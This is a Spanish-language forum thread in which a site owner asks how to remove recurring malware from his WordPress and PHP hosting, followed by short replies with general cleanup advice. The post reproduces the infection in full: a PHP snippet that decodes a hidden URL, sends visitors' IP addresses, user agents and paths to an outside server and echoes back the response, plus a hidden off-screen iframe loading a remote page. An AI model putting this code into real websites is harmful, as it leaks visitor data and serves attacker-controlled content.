Eliminar virus en hosting de Wordpress y PHP

tumastervip

tumastervip Seguir

Delta
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
19 Oct 2010
Mensajes
709
Estoy cansado de eliminar a cada momento este maldito virus, se está esparciendo por todo mi hosting donde tengo algunas webs alojadas, la verdad no se qué hacer esta metiéndose a cada archivo php que encuentra tengo algunas en wordpress y otras en php, nunca me había pasado algo igual, estoy abrumado y desesperado, si alguien paso por algo similar y sepa cómo resolverlo espero que me den una manito.

A continuación pongo el código php de infección, y un iframe que se creó también.

PHP: 
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

Iframe
<iframe src="http://britannicacomfast.biz:59334/cnet/user_files/updates.php?refer=1" width="100" height="100" style="width:100px;height:100px;position:absolute;left:-10000px;top:0;"></iframe>

Gracias de antemano.
 
F

Federico Piccoli

Gamma
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
16 Sep 2012
Mensajes
263
Ciao

Si la infeccion se repite yo pensaria en cambiar de hosting (que en general son poco o nada seguros) y a la vez pensaria tambien en limpiar mi pc que puede ser el foco de infeccion.
 
M

miguelitorodriguez

Beta
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
21 Jul 2013
Mensajes
56
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
Interesante código, lo analizare .
 
axdds34

axdds34

Iota
Redactor
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
16 Jul 2011
Mensajes
2.348
Hola [MENTION=3751]tumastervip[/MENTION] conseguiste solucionar este error.???
 
danielbp

danielbp

Delta
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
4 Ago 2010
Mensajes
697
borrar y eliminar código y cambiar todas y cada una de las contraseñas (ftp, acceso al admin, etc.) y hacerlas más robustas puede ser una buena solución momentánea... y que suele funcionar en el tiempo
 
Hay que estar conectado o registrado para responder aquí.
Arriba